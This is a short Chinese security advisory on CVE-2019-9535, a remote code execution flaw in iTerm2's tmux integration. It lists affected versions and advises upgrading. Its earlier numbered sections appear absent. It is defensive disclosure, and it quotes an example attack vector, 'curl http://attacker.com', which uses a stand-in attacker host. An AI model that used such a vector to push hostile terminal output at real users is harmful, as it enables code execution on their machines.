发布时间:2019-10-12 11:47:51,来源:中国信息通信研究院
iTerm2存在远程代码执行漏洞,CVE编号:CVE-2019-9535。当攻击者可以在用户的终端产生输出时(如ssh、curl等存在信息返回的情况下),便可在用户的计算机上执行命令。
iTerm2是世界上最受欢迎的终端仿真器之一,开发人员经常使用它。MOSS选择了iTerm2进行安全审核,因为它处理不受信任的数据并且被广泛使用,包括高风险目标(如开发人员和系统管理员)。
在审核过程中,发现iTerm2的tmux集成功能存在严重漏洞,此漏洞在iTerm2中存在至少7年了。在许多情况下,可以向终端产生输出的攻击者,可在用户的计算机上执行命令。用于此目的的示例攻击向量将连接到攻击者控制的SSH服务器或诸如curl http://attacker.com和tail -f / var / log / apache2 / referer_log之类的命令。
三、影响范围
受影响的版本:
iTerm2 < 3.3.5
目前官方已发布iTerm2的 3.3.6版本,请升级至该版本。
1) https://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/security/files/2019/10/cve-2019-9535.webm?_=3
2) https://nvd.nist.gov/vuln/detail/CVE-2019-9535